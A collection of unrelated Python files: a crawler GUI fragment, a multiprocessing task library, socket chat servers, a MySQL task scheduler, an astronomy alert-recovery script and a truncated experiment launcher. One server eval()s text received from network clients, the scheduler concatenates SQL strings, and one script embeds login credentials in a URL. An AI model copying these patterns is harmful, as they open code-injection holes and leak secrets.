max, argMax = qVal, action
if argMax != 'unseen':
if argMax == 'kickLeft':
color = 'blue'
elif argMax == 'kickRight':
color = 'red'
elif argMax == 'doNothing':
color = 'white'
dx = length / 100.0
dy = length / 100.0
x0, y0 = x + i * dx, y - j * dy
self.canvas.create_rectangle(x0, y0, x0 + dx, y0 + dy, fill=color)
def run(self):
self.stepCount = 0
self.learner.startEpisode()
while True:
minSleep = .01
tm = max(minSleep, self.tickTime)
time.sleep(tm)
self.stepsToSkip = int(tm / self.tickTime) - 1
if not self.running:
self.stopped = True
return
for i in range(self.stepsToSkip):
self.step()
self.stepsToSkip = 0
self.step()
# self.robot.draw()
self.learner.stopEpisode()
def start(self):
self.win.mainloop()
def run():
global root
root = Tkinter.Tk()
root.title('Crawler GUI')
root.resizable(0, 0)
# root.mainloop()
app = Application(root)
def update_gui():
app.robot.draw(app.stepCount, app.tickTime)
root.after(10, update_gui)
update_gui()
root.protocol('WM_DELETE_WINDOW', app.exit)
try:
app.start()
except:
app.exit()
|
parallel_processor.py
|
"""
ParallelProcessor utilizes multiple CPU cores to process compute-intensive tasks.
If you have a some time-consuming statements in a for-loop and no state is shared among loops, you can map these
statements to different processes. Assume you need to process a couple of files, you can do this in parallel::
def mapper(filename):
with open(filename) as f_in, open(filename + '.out') as f_out:
f_out.write(process_a_file(f_in.read()))
pp = ParallelProcessor(2, mapper)
pp.start()
for fname in ['file1', 'file2', 'file3', 'file4']:
pp.add_task(fname)
pp.task_done()
pp.join()
It's not required to write a cumbersome loop statement if you have iterable object or type (list, generator, etc).
Instead, you could use `map`::
pp = ParallelProcessor(2, mapper)
pp.start()
pp.map(['file1', 'file2', 'file3', 'file4'])
pp.task_done()
pp.join()
Usually, some files are small and some are big, it would be better if it can keep all cores busy.
One way is to send content line by line to each process (assume content is line-separated)::
def mapper(line, _idx):
with open('processed_{}.out'.format(_idx), 'a') as f_out:
f_out.write(process_a_line(line))
pp = ParallelProcessor(2, mapper, enable_process_id=True)
pp.start()
for fname in ['file1', 'file2', 'file3', 'file4']:
with open(fname) as f_in:
for line in f_in:
pp.add_task(line)
pp.task_done()
pp.join()
One problem here is you need to acquire file descriptor every time the mapper is called.
To avoid this, use Mapper class to replace mapper function.
It allows user to define how the process is constructed and deconstructed::
class MyMapper(Mapper):
def enter(self):
self.f = open('processed_{}.out'.format(self._idx), 'w')
def exit(self, *args, **kwargs):
self.f.close()
def process(self, line):
self.f.write(process_a_line(line))
pp = ParallelProcessor(..., mapper=MyMapper, ...)
In some situations, you may need to use `collector` to collect data back from child processes to main process::
processed = []
def mapper(line):
return process_a_line(line)
def collector(data):
processed.append(data)
pp = ParallelProcessor(2, mapper, collector=collector)
pp.start()
for fname in ['file1', 'file2', 'file3', 'file4']:
with open(fname) as f_in:
for line in f_in:
pp.add_task(line)
pp.task_done()
pp.join()
print(processed)
You can count the executions in `collector` to estimate the progress. To get the progress of mapper, \
create a progress function and set it in `ParallelProcessor`::
def progress(p):
# print('Total task: {}, Added to queue: {}, Mapper Loaded: {}, Mapper Processed {}'.format(
# p['total'], p['added'], p['loaded'], p['processed']))
if p['processed'] % 10 == 0:
print('Progress: {}%'.format(100.0 * p['processed'] / p['total']))
pp = ParallelProcessor(8, mapper=mapper, progress=progress, progress_total=len(tasks))
pp.start()
for t in tasks:
pp.add_task(t)
"""
import multiprocess as mp
import threading
import queue
import inspect
import sys
import typing
from typing import Callable, Iterable
from pyrallel import Paralleller
if sys.version_info >= (3, 8):
from pyrallel import ShmQueue
class Mapper(object):
"""
Mapper class.
This defines how mapper works.
The methods will be called in following order::
enter (one time) -> process (many times) -> exit (one time)
"""
def __init__(self, idx):
self._idx = idx
self._progress_info = ProgressThread.init_mapper_progress_info()
def __enter__(self):
self.enter()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.exit(exc_type, exc_val, exc_tb)
def enter(self):
"""
Invoked when subprocess is created and listening the queue.
"""
pass
def exit(self, *args, **kwargs):
"""
Invoked when subprocess is going to exit. Arguments will be set if exception occurred.
"""
pass
def process(self, *args, **kwargs):
"""
Same as mapper function, but `self` argument can provide additional context (e.g., `self._idx`).
"""
raise NotImplementedError
class CollectorThread(threading.Thread):
"""
Handle collector in main process.
Create a thread and call ParallelProcessor.collect().
"""
def __init__(self, instance, collector):
super(CollectorThread, self).__init__()
self.collector = collector
self.instance = instance
def run(self):
for batched_collector in self.instance.collect():
for o in batched_collector:
self.collector(*o)
class ProgressThread(threading.Thread):
"""
Progress information in main process.
"""
P_ADDED = 0
P_LOADED = 1
P_PROCESSED = 2
P_TOTAL = 3
def __init__(self, instance, progress, progress_total, num_of_processor):
super(ProgressThread, self).__init__()
self.progress_info = {
ProgressThread.P_ADDED: 0,
ProgressThread.P_LOADED: 0,
ProgressThread.P_PROCESSED: 0,
ProgressThread.P_TOTAL: progress_total
}
self.mapper_progress_info = [ProgressThread.init_mapper_progress_info() for _ in range(num_of_processor)]
self.instance = instance
self.progress = progress
@staticmethod
def init_mapper_progress_info():
return {ProgressThread.P_LOADED: 0, ProgressThread.P_PROCESSED: 0}
def refresh_progress_info(self):
self.progress_info[ProgressThread.P_LOADED] \
= sum([p[ProgressThread.P_LOADED] for p in self.mapper_progress_info])
self.progress_info[ProgressThread.P_PROCESSED] \
= sum([p[ProgressThread.P_PROCESSED] for p in self.mapper_progress_info])
def run(self):
for idx, mapper_progress_info in self.instance.get_progress():
self.mapper_progress_info[idx] = mapper_progress_info
self.refresh_progress_info()
progress_info = {
'added': self.progress_info[ProgressThread.P_ADDED],
'loaded': self.progress_info[ProgressThread.P_LOADED],
'processed': self.progress_info[ProgressThread.P_PROCESSED],
'total': self.progress_info[ProgressThread.P_TOTAL],
}
self.progress(progress_info)
class ParallelProcessor(Paralleller):
"""
Args:
num_of_processor (int): Number of processes to use.
mapper (Callable / Mapper): Function or subclass of `Mapper` class.
max_size_per_mapper_queue (int, optional): Maximum size of mapper queue for one process.
If it's full, the corresponding process will be blocked.
0 by default means unlimited.
collector (Callable, optional): If the collector data needs to be get in main process (another thread),
set this handler, the arguments are same to the return from mapper.
The return result is one by one, order is arbitrary.
max_size_per_collector_queue (int, optional): Maximum size of collector queue for one process.
If it's full, the corresponding process will be blocked.
0 by default means unlimited.
enable_process_id (bool, optional): If it's true, an additional argument `_idx` (process id) will be
passed to `mapper` function. This has no effect for `Mapper` class.
It defaults to False.
batch_size (int, optional): Batch size, defaults to 1.
progress (Callable, optional): Progress function, which takes a dictionary as input.
The dictionary contains following keys: `total` can be set by `progress_total`,
`added` indicates the number of tasks has been added to the queue,
`loaded` indicates the number of tasks has been loaded to worker processes,
`processed` indicates the number of tasks has been processed by worker processes.
Defaults to None.
progress_total (int, optional): Total number of tasks. Defaults to None.
use_shm (bool, optional): When True, and when running on Python version 3.8 or later,
use ShmQueue for higher performance. Defaults to False.
enable_collector_queues (bool, optional): When True, create a collector queue for each
processor. When False, do not allocate collector queues, saving
resources. Defaults to True.
single_mapper_queue (bool, optional): When True, allocate a single mapper queue that will
be shared between the worker processes. Sending processes can
go to sleep when the mapper queue is full. When False, each process
gets its own mapper queue, and CPU-intensive polling may be needed to
find a mapper queue which can accept a new request.
Note:
- Do NOT implement heavy compute-intensive operations in collector, they should be in mapper.
- Tune the value for queue size and batch size will optimize performance a lot.
- `collector` only collects returns from `mapper` or `Mapper.process`.
- The frequency of executing `progress` function depends on CPU.
"""
# Command format in queue. Represent in tuple.
# The first element of tuple will be command, the rests are arguments or data.
# (CMD_XXX, args...)
CMD_DATA = 0
CMD_STOP = 1
QSTATS_ON = 0
QSTATS_OFF = 1
def __init__(self, num_of_processor: int, mapper: Callable, max_size_per_mapper_queue: int = 0,
collector: Callable = None, max_size_per_collector_queue: int = 0,
enable_process_id: bool = False, batch_size: int = 1, progress=None, progress_total = None,
use_shm=False, enable_collector_queues=True,
single_mapper_queue: bool = False):
self.num_of_processor = num_of_processor
self.single_mapper_queue = single_mapper_queue
if sys.version_info >= (3, 8):
self.collector_queues: typing.Optional[typing.Union[ShmQueue, mp.Queue]]
else:
self.collector_queues: typing.Optional[mp.Queue]
if use_shm:
if sys.version_info >= (3, 8):
if single_mapper_queue:
self.mapper_queues = [ShmQueue(maxsize=max_size_per_mapper_queue * num_of_processor)]
else:
self.mapper_queues = [ShmQueue(maxsize=max_size_per_mapper_queue) for _ in range(num_of_processor)]
if enable_collector_queues:
self.collector_queues = [ShmQueue(maxsize=max_size_per_collector_queue) for _ in range(num_of_processor)]
else:
self.collector_queues = None
else:
raise ValueError("shm not available in this version of Python.")
else:
if single_mapper_queue:
self.mapper_queues = [mp.Queue(maxsize=max_size_per_mapper_queue * num_of_processor)]
else:
self.mapper_queues = [mp.Queue(maxsize=max_size_per_mapper_queue) for _ in range(num_of_processor)]
if enable_collector_queues:
self.collector_queues = [mp.Queue(maxsize=max_size_per_collector_queue) for _ in range(num_of_processor)]
self.collector_qstats = [self.QSTATS_ON for _ in range(num_of_processor)]
else:
self.collector_queues = None
if self.collector_queues is not None:
if single_mapper_queue:
self.processes = [mp.Process(target=self._run, args=(i, self.mapper_queues[0], self.collector_queues[i]))
for i in range(num_of_processor)]
else:
self.processes = [mp.Process(target=self._run, args=(i, self.mapper_queues[i], self.collector_queues[i]))
for i in range(num_of_processor)]
else:
if single_mapper_queue:
self.processes = [mp.Process(target=self._run, args=(i, self.mapper_queues[0], None))
for i in range(num_of_processor)]
else:
self.processes = [mp.Process(target=self._run, args=(i, self.mapper_queues[i], None))
for i in range(num_of_processor)]
if progress is not None:
if sys.version_info >= (3, 8):
self.progress_queues: typing.Optional[typing.Union[ShmQueue, mp.Queue]]
else:
self.progress_queues: typing.Optional[mp.Queue]
if use_shm:
if sys.version_info >= (3, 8):
self.progress_queues = [ShmQueue(maxsize=1) for _ in range(num_of_processor)]
else:
raise ValueError("shm not available in this version of Python.")
else:
self.progress_queues = [mp.Queue(maxsize=1) for _ in range(num_of_processor)]
self.progress_qstats = [self.QSTATS_ON for _ in range(num_of_processor)]
else:
self.progress_queues = None
self.progress = progress
ctx = self
if not inspect.isclass(mapper) or not issubclass(mapper, Mapper):
class DefaultMapper(Mapper):
def process(self, *args, **kwargs):
if ctx.enable_process_id:
kwargs['_idx'] = self._idx
return mapper(*args, **kwargs)
self.mapper = DefaultMapper
else:
self.mapper = mapper
self.collector = collector
self.mapper_queue_index = 0
self.enable_process_id = enable_process_id
self.batch_size = batch_size
self.batch_data = []
# collector can be handled in each process or in main process after merging (collector needs to be set)
# if collector is set, it needs to be handled in main process;
# otherwise, it assumes there's no collector.
if collector:
self.collector_thread = CollectorThread(self, collector)
if progress:
self.progress_thread = ProgressThread(self, progress, progress_total, num_of_processor)
def start(self):
"""
Start processes and threads.
"""
if self.collector:
self.collector_thread.start()
if self.progress:
self.progress_thread.start()
for p in self.processes:
p.start()
def join(self):
"""
Block until processes and threads return.
"""
if self.collector:
self.collector_thread.join()
if self.progress:
self.progress_thread.join()
for p in self.processes:
p.join()
for q in self.mapper_queues:
q.close()
q.join_thread()
if self.collector_queues is not None:
for q in self.collector_queues:
q.close()
q.join_thread()
if self.progress_queues is not None:
for q in self.progress_queues:
q.close()
q.join_thread()
pass
def task_done(self):
"""
Indicate that all resources which need to add_task are added to processes.
(main process, blocked)
"""
if len(self.batch_data) > 0:
self._add_task(self.batch_data)
self.batch_data = []
for i in range(self.num_of_processor):
if self.single_mapper_queue:
self.mapper_queues[0].put((ParallelProcessor.CMD_STOP,))
else:
self.mapper_queues[i].put((ParallelProcessor.CMD_STOP,))
def add_task(self, *args, **kwargs):
"""
Add data to one a mapper queue.
When a single mapper queue is in use, put the process to sleep if the
queue is full. When multiple mapper queues are in use (one per process),
use CPU-intensive polling (round-robin processing) to find the next available
queue. (main process, blocked or unblocked depending upon single_mapper_queue)
"""
self.batch_data.append((args, kwargs))
if self.progress:
self.progress_thread.progress_info[ProgressThread.P_ADDED] += 1
if len(self.batch_data) == self.batch_size:
self._add_task(self.batch_data)
self.batch_data = [] # reset buffer
def _add_task(self, batched_args):
if self.single_mapper_queue:
self.mapper_queues[0].put((ParallelProcessor.CMD_DATA, batched_args))
else:
while True:
q = self.mapper_queues[self.mapper_queue_index]
self.mapper_queue_index = (self.mapper_queue_index + 1) % self.num_of_processor
try:
q.put_nowait((ParallelProcessor.CMD_DATA, batched_args))
return # put in
except queue.Full:
continue # find next available
def _run(self, idx: int, mapper_queue: mp.Queue, collector_queue: typing.Optional[mp.Queue]):
"""
Process's activity. It handles queue IO and invokes user's mapper handler.
(subprocess, blocked, only two queues can be used to communicate with main process)
"""
with self.mapper(idx) as mapper:
while True:
data = mapper_queue.get()
if data[0] == ParallelProcessor.CMD_STOP:
# print(idx, 'stop')
self._update_progress(mapper, finish=True)
if self.collector and collector_queue is not None:
collector_queue.put((ParallelProcessor.CMD_STOP,))
return
elif data[0] == ParallelProcessor.CMD_DATA:
batch_result = []
for d in data[1]:
args, kwargs = d[0], d[1]
# print(idx, 'data')
self._update_progress(mapper, type_=ProgressThread.P_LOADED)
result = mapper.process(*args, **kwargs)
self._update_progress(mapper, type_=ProgressThread.P_PROCESSED)
if collector_queue is not None:
if self.collector:
if not isinstance(result, tuple): # collector must represent as tuple
result = (result,)
batch_result.append(result)
if collector_queue is not None and len(batch_result) > 0:
collector_queue.put((ParallelProcessor.CMD_DATA, batch_result))
batch_result = [] # reset buffer
def _update_progress(self, mapper, type_=None, finish=False):
if self.progress:
try:
if not finish:
# No need to ensure the status will be pulled from main process
# so if queue is full just skip this update
mapper._progress_info[type_] += 1
self.progress_queues[mapper._idx].put_nowait( (ParallelProcessor.CMD_DATA, mapper._progress_info) )
else:
# update the last progress of each mapper
self.progress_queues[mapper._idx].put( (ParallelProcessor.CMD_STOP, mapper._progress_info) )
except queue.Full:
pass
def collect(self):
"""
Get data from collector queue sequentially.
(main process, unblocked, using round robin to find next available queue)
"""
if not self.collector:
return
idx = 0
while True:
# all queues finished
if sum([int(s == self.QSTATS_OFF) for s in self.collector_qstats]) == self.num_of_processor:
return
# get next unfinished queue
while self.collector_qstats[idx] == self.QSTATS_OFF:
idx = (idx + 1) % self.num_of_processor
q = self.collector_queues[idx]
try:
data = q.get_nowait() # get out
if data[0] == ParallelProcessor.CMD_STOP:
self.collector_qstats[idx] = self.QSTATS_OFF
elif data[0] == ParallelProcessor.CMD_DATA:
yield data[1]
except queue.Empty:
continue # find next available
finally:
idx = (idx + 1) % self.num_of_processor
def get_progress(self):
"""
Get progress information from each mapper.
(main process)
"""
if not self.progress:
return
idx = 0
while True:
# all queues finished
if sum([int(s == self.QSTATS_OFF) for s in self.progress_qstats]) == self.num_of_processor:
return
# get next unfinished queue
while self.progress_qstats[idx] == self.QSTATS_OFF:
idx = (idx + 1) % self.num_of_processor
q = self.progress_queues[idx]
try:
data = q.get_nowait()
if data[0] == ParallelProcessor.CMD_STOP:
self.progress_qstats[idx] = self.QSTATS_OFF
elif data[0] == ParallelProcessor.CMD_DATA:
pass
yield idx, data[1]
except queue.Empty:
continue # find next available
finally:
idx = (idx + 1) % self.num_of_processor
|
server.py
|
import os
import socket
import threading
from copy import deepcopy
HOST = ''
PORT = 8000
BUFFER = 1024
ADDR = (HOST, PORT)
ADDRS = []
ADDR_CONN = {}
FILE_RECV = []
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(ADDR)
s.listen(10)
def msg_handle(data, conn: socket.socket, addr: tuple):
try:
data = data.decode('utf-8')
try:
head,data,usrs = data.split('::')
except (TypeError, ValueError):
print('Transmitting file...')
data = data.encode()
head = ''
except UnicodeDecodeError:
print('Transmitting file...')
head = ''
if head == 'ONLINE':
addr_copy = deepcopy(ADDRS)
addr_copy.remove(addr)
conn.send('ONLINE::{}'.format(addr_copy).encode())
del addr_copy
elif head == 'MSG':
print(usrs, type(usrs))
for usr in eval(usrs):
try:
ADDR_CONN[usr].send(f'MSG::{data}'.encode())
except OSError:
ADDR_CONN.pop(usr)
# conn.send('MSG:[{0}] {1}'.format(ctime(), data).encode())
elif head == 'FILE':
FILE_RECV.clear()
if data == 'OK':
usr = eval(usrs)
FILE_RECV.append(addr)
ADDR_CONN[usr].send(f'FILE::OK'.encode())
else:
for usr in eval(usrs):
ADDR_CONN[usr].send(f'FILE::{data};;{addr}'.encode())
# t = threading.Thread(target=file_handle, args=(data,usrs,conn,addr))
# t.start()
elif head == 'IMG':
FILE_RECV.clear()
for usr in eval(usrs):
FILE_RECV.append(usr)
ADDR_CONN[usr].send(f'IMG::{data};;{addr}'.encode())
print(usrs)
else:
# print(data, type(data))
for usr in FILE_RECV:
ADDR_CONN[usr].send(data)
def link_solve(conn: socket.socket, addr: tuple):
while 1:
try:
# data = conn.recv(BUFFER).decode('utf-8')
data = conn.recv(BUFFER)
if not data:
break
msg_handle(data, conn, addr)
except ConnectionResetError as e:
print(f'{e}')
print(f'{addr} offline.')
ADDRS.remove(addr)
ADDR_CONN.pop(addr)
break
conn.close()
def recv_data():
while 1:
print('waiting for connection...')
conn, addr = s.accept()
print('...connecting from:', addr)
if addr not in ADDRS:
ADDRS.append(addr)
ADDR_CONN[addr] = conn
t = threading.Thread(target=link_solve,args=(conn, addr))
t.start()
s.close()
if __name__ == '__main__':
t1 = threading.Thread(target=recv_data, args=())
t1.start()
|
server.py
|
import socket
import threading
HEADER = 64
PORT = 5050
FORMAT = "utf-8"
DISCONNECT_MESSAGE = "!DISCONNECT"
# SERVER = socket.gethostbyname(socket.gethostname()) # Get the IP address automatically
SERVER = "192.168.0.114"
ADDR = (SERVER,PORT)
server = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
server.bind(ADDR)
def handle_client(conn, addr):
print(f"[NEW CONNECTION] {addr} connected.")
connected = True
while connected:
# We'll not pass this line until we get a msg from the client
msg_length = conn.recv(HEADER).decode(FORMAT)
if msg_length:
msg_length = int(msg_length)
msg = conn.recv(msg_length).decode(FORMAT)
if msg == DISCONNECT_MESSAGE:
connected = False
print(f"[{addr}] {msg}")
conn.close()
def start():
server.listen()
print(f"[LISTENING] Server is listening on {SERVER}")
while True:
conn, addr = server.accept()
thread = threading.Thread(target=handle_client, args=(conn, addr))
thread.start()
print(f"[ACTIVE CONNECTIONS]: {threading.activeCount() - 1}")
print("[STARTING] server is starting ....")
start()
|
beat.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Task Beat
This module define function which can execute muti-asyn-task and dispatch tasks.
Use stack to sort the date of task which will be executing.Min_time is the Main
processing sleeping time that can compute more quick to execute task .
pool = db_instance.ConnectionPool(**db_config.mysql)linu
...
use database pool to connect mysql
@async
def execute_task(taskList):
...
use muti-thread to execute task. Performance: 1000 tasks /s
Usage:
$ python task_beat.py
suggestion:
you can use supervisor to make sure the main progress will not die in abnormal
condition .
"""
from datetime import datetime, timedelta
from threading import Thread
from config import shadowx_config, shadowx_sqlconfig
from config.shadowx_config import DATE_FORMATE
from dbpool import db_instance
from worker import execute
from run.crontab import crontab_run_nextTime
import time
import json
import heapq
MAIN_SLEEP_TIME = 1
def async(f):
'''线程异步'''
def wrapper(*args, **kwargs):
thr = Thread(target=f, args=args, kwargs=kwargs)
thr.start()
return wrapper
def date_seconds(date1, date2):
'''将时间差转化为秒'''
di = date2 - date1
return di.days*24*3600 + di.seconds
def connection_pool():
'''获取连接池实例 '''
pool = db_instance.ConnectionPool(**shadowx_config.mysql)
return pool
def init_task():
'''初始化任务 '''
with connection_pool().cursor() as cursor:
print("init ...")
init_time = (datetime.now()).strftime(DATE_FORMATE)
sql = "update monitor_items set last_run_time = '" + init_time + "'"
cursor.execute(sql)
@async
def update_task(task_id, run_time):
'''异步更新任务的执行时间 '''
with connection_pool().cursor() as cursor:
sql = "update monitor_items set last_run_time = '" + run_time + "' where id = %d" % task_id
cursor.execute(sql)
def execute_muti_tasks(id, task_name, task_args):
task_args = eval(task_args)
task_args["item_id"] = str(id)
execute.apply_async(args=[task_name], kwargs=eval(str(task_args)))
@async
def execute_task(taskList):
'''最小堆执行任务 '''
now_time = datetime.now()
run_time = list()
count = 0
for task in taskList:
dt = date_seconds(now_time, task['last_run_time'])
# 如果得到的结果为0,则执行任务,修改时间为最新的next_run_time
if dt == 0:
# 执行循环任务
if task['task_type'] == 1:
if task['task_args'] is None:
execute.apply_async(args=[task['task_name']])
else:
execute_muti_tasks(task['id'], task['task_name'], task['task_args'])
next_run_time = (datetime.now() + timedelta(seconds=task['sec'])).strftime(DATE_FORMATE)
update_task(task_id=task['id'], run_time=next_run_time)
run_time.append(task['sec'])
count += 1
# 执行定时任务
elif task['task_type'] == 2:
if task['task_args'] is None:
execute.apply_async(args=[task['task_name']])
else:
execute_muti_tasks(task['id'], task['task_name'], task['task_args'])
# 计算下次运行的时间
next_run_time = crontab_run_nextTime(task['crontab'])[0]
update_task(task_id=task['id'], run_time=next_run_time)
run_time.append(date_seconds(datetime.strptime(next_run_time, DATE_FORMATE), now_time))
count += 1
elif dt < 0:
# linu如果得到的结果为负数,则需要修改时间为最新的next_run_time
if task['task_type'] == 1:
next_run_time = (datetime.now() + timedelta(seconds=task['sec'])).strftime(DATE_FORMATE)
update_task(task_id=task['id'], run_time=next_run_time)
run_time.append(task['sec'])
elif task['task_type'] == 2:
next_run_time = crontab_run_nextTime(task['crontab'])[0]
update_task(task_id=task['id'], run_time=next_run_time)
run_time.append(date_seconds(datetime.strptime(next_run_time, DATE_FORMATE), now_time))
else:
run_time.append(dt)
if count > 0:
print("execute success tasks: %d " % count)
print(run_time)
def _main(notin):
'''可以用本地队列对全量获取task做优化'''
with connection_pool().cursor() as cursor:
res = cursor.execute(shadowx_sqlconfig.GET_SOME_TASK + str(notin))
tasks = sorted(cursor, key=lambda x: x['id'])
# 返回最小休眠时间
if list(tasks).__len__() > 0:
print(datetime.now().strftime(DATE_FORMATE) + ": main process sleeping and task num: %d " % list(
tasks).__len__())
execute_task(list(tasks))
else:
print("task num is zero , sleeping %d s" % 5)
time.sleep(5)
# 主进程休眠
time.sleep(MAIN_SLEEP_TIME)
'''
tasks[0]: 监控开关
tasks[1]: A类监控开关
tasks[2]: B类监控开关
tasks[3]: C类监控开关
tasks[4]: D类监控开关
tasks[5]: E类监控开关
tasks[6]: 日志监控开关
'''
def _main_set():
with connection_pool().cursor() as cursor:
res = cursor.execute(shadowx_sqlconfig.GET_WARN_SET)
tasks = sorted(cursor, key=lambda x: x['id'])
notin = []
for task in tasks[1:]:
if task["status"] == 0:
notin.append(task["id"])
notin.append(0)
return tasks[0], tuple(notin)
def run():
notin = _main_set()[1]
if _main_set()[0]["status"]:
_main(notin)
else:
print("Monitor is closed ")
time.sleep(5)
if __name__ == "__main__":
init_task()
# 出现异常不会中断进程
while True:
try:
run()
except:
run()
|
recover_ssnamenr.py
|
#!/usr/bin/env python
"""
Recover missing columns in the archive database from UW tarballs
"""
import datetime
import itertools
import io
import logging
import multiprocessing
import tarfile
import time
import queue
import fastavro
import requests
from ampel.pipeline.t0.alerts.TarAlertLoader import TarAlertLoader
from ampel.archive import ArchiveDB
def blobs_from_tarball(procnum, queue, date, partnership=True):
i = 0
try:
if partnership:
url = 'https://ztf:16chipsOnPalomar@ztf.uw.edu/alerts/partnership/ztf_partnership_{}.tar.gz'.format(date)
else:
url = 'https://ztf.uw.edu/alerts/public/ztf_public_{}.tar.gz'.format(date)
response = requests.get(url, stream=True)
response.raise_for_status()
loader = TarAlertLoader(file_obj=response.raw)
for i, fileobj in enumerate(iter(loader)):
queue.put(fileobj.read())
except (tarfile.ReadError, requests.exceptions.HTTPError):
pass
finally:
if i > 0:
log.info('ztf_{}_{} finished ({} alerts)'.format(['public', 'partnership'][partnership], date, i))
queue.put(procnum)
from sqlalchemy import select, and_, bindparam, exists
from sqlalchemy.sql.schema import UniqueConstraint
class Updater:
def __init__(self, connection, table, fields):
self._connection = connection
ids = next(c for c in table.constraints if isinstance(c, UniqueConstraint)).columns
condition = and_(*(c == bindparam('b_'+c.name) for c in ids))
values = {name: bindparam('b_'+name) for name in fields}
pkey = table.primary_key.columns.values()[0]
# NB: because we select by a set of columns with a UNIQUE constraint,
# all rows that are locked can be safely skipped, as they are already
# being updated in another process
self._query = table.update().where(pkey==select([pkey]).where(condition).with_for_update(skip_locked=True)).values(**values)
self._fields = set([c.name for c in ids] + list(fields))
self._values = []
def __len__(self):
return len(self._values)
def add(self, list_of_dicts):
self._values += [{'b_'+k: item.get(k) for k in self._fields} for item in list_of_dicts]
def commit(self):
if len(self._values) == 0:
return
self._connection.execute(self._query, self._values)
self._values.clear()
def split_upper_limits(prv):
parts = [[], []]
if prv is not None:
for element in prv:
parts[element['candid'] is None].append(element)
return parts
def ingest_blobs(procnum, queue, archive_url):
db = ArchiveDB(archive_url)
# end implicit transaction
db._connection.execute('COMMIT')
update_candidate = Updater(db._connection, db._meta.tables['candidate'], ('isdiffpos', 'ssnamenr', 'magzpscirms'))
update_prv_candidate = Updater(db._connection, db._meta.tables['prv_candidate'], ('isdiffpos', 'ssnamenr'))
update_upper_limit = Updater(db._connection, db._meta.tables['upper_limit'], ('rbversion',))
def commit():
with db._connection.begin() as transaction:
try:
update_candidate.commit()
update_prv_candidate.commit()
update_upper_limit.commit()
transaction.commit()
except:
transaction.rollback()
raise
while True:
try:
blob = queue.get()
alert = next(fastavro.reader(io.BytesIO(blob)))
update_candidate.add([alert['candidate']])
dets, uls = split_upper_limits(alert['prv_candidates'])
update_prv_candidate.add(dets)
update_upper_limit.add(uls)
if len(update_candidate) > 1000:
commit()
except:
commit()
raise
'''
def ingest_blobs(procnum, queue, archive_url):
while True:
blob = queue.get()
if blob is None:
break
'''
def recover(args):
logging.basicConfig(level='INFO', format='%(asctime)s %(name)s:%(levelname)s: %(message)s')
log = logging.getLogger()
# Spawn 1 reader each for the public and private alerts of each night
begin = datetime.datetime(2018,6,1)
dates = [(begin + datetime.timedelta(i)).strftime('%Y%m%d') for i in range((datetime.datetime.now()- begin).days)]*2
input_queue = multiprocessing.Queue(10*args.workers)
sources = {i: multiprocessing.Process(target=blobs_from_tarball, args=(i,input_queue,date,i%2==0)) for i,date in enumerate(dates)}
for i, p in enumerate(sources.values()):
if i == args.workers:
break
p.start()
output_queues = [multiprocessing.Queue(10) for i in range(args.workers)]
sinks = {i: multiprocessing.Process(target=ingest_blobs, args=(i,output_queues[i],args.archive)) for i in range(args.workers)}
for p in sinks.values():
p.start()
try:
t0 = time.time()
count = 0
chunk = 10000
while len(sources) > 0 or not input_queue.empty():
message = input_queue.get()
if isinstance(message, int):
sources[message].join()
del sources[message]
ready = [p for p in sources.values() if p.pid is None]
if len(ready) > 0:
ready[0].start()
else:
min(output_queues, key=lambda q: q.qsize()).put(message)
count += 1
if count % chunk == 0:
dt = time.time() - t0
log.info('{} ({:.1f} alerts/s)'.format(count, chunk/dt))
t0 = time.time()
finally:
for p in sources.values():
p.terminate()
p.join()
for i, q in enumerate(output_queues):
log.info("Stopping sink {}".format(i))
q.put(None)
sinks[i].join()
def check(args):
from astropy.time import Time
from sqlalchemy import and_, func, select
from sqlalchemy.sql.functions import count
import sys
begin = datetime.datetime(2018,6,1)
end = begin + datetime.timedelta((datetime.datetime.now() - begin).days)
dates = [(begin + datetime.timedelta(i)) for i in range((datetime.datetime.now()- begin).days)]
programs = ['public', 'partnership']
db = ArchiveDB(args.archive)
Alert = db._meta.tables['alert']
jd = func.width_bucket(Alert.c.jd, Time(begin).jd, Time(end).jd, int(Time(end).jd-Time(begin).jd))
programid = func.width_bucket(Alert.c.programid, 0.5,2.5,2)
q = select([jd, programid, count()]).group_by(jd, programid).order_by(jd, programid)
total = 0
for row in db._connection.execute(q):
i, j, count = row
if j < 1 or j > 2 or i < 1 or i > len(dates):
continue
total += count
label = 'ztf_{}_{}'.format(programs[j-1], dates[i-1].strftime('%Y%m%d'))
print('{} finished ({} alerts)'.format(label, count-1))
sys.stderr.write('{} total\n'.format(total))
return
programs = {1: 'public', 2: 'partnership'}
for date, bounds in zip(dates, bounds):
for programid, name in programs.items():
label = 'ztf_{}_{}'.format(name, date.strftime('%Y%m%d'))
q = Alert.count(and_(Alert.c.jd > bounds[0].jd, Alert.c.jd < bounds[1].jd, Alert.c.programid == programid))
count = db._connection.execute(q).fetchone()[0]
if count > 0:
print('{} finished ({} alerts)'.format(label, count-1))
sys.stdout.flush()
if __name__ == "__main__":
from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter
parser = ArgumentParser(description=__doc__, formatter_class=ArgumentDefaultsHelpFormatter)
parser.add_argument("--archive", type=str, default="localhost:5432")
subparsers = parser.add_subparsers()
p = subparsers.add_parser('recover')
p.set_defaults(func=recover)
p.add_argument("--workers", type=int, default=4, help="Number of db clients to start")
p = subparsers.add_parser('check')
p.set_defaults(func=check)
args = parser.parse_args()
args.func(args)
|
swimmer-v2.py
|
import os, sys, signal
import random
import numpy as np
from multiprocessing import Process, Queue, current_process, freeze_support
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--pgmorl', default=False, action='store_true')
parser.add_argument('--ra', default=False, action='store_true')
parser.add_argument('--pfa', default=False, action='store_true')
parser.add_argument('--moead', default=False, action='store_true')
parser.add_argument('--random', default=False, action='store_true')
parser.add_argument('--num-seeds', type=int, default=6)
parser.add_argument('--num-processes',
type=int,
default=1,
help='number of algorithms to be run in parallel (Note: each algorithm needs 4 * num-tasks processors by default, so the total number of processors is 4 * num-tasks * num-processes.)')
parser.add_argument('--save-dir', type=str, default='./results/Swimmer-v2')
args = parser.parse_args()
random.seed(2000)
commands = []
save_dir = args.save_dir
test_pgmorl = args.pgmorl
test_ra = args.ra
test_random = args.random
test_pfa = args.pfa
test_moead = args.moead
for i in range(args.num_seeds):
seed = random.randint(0, 1000000)
if test_pgmorl:
cmd = 'python morl/run.py '\
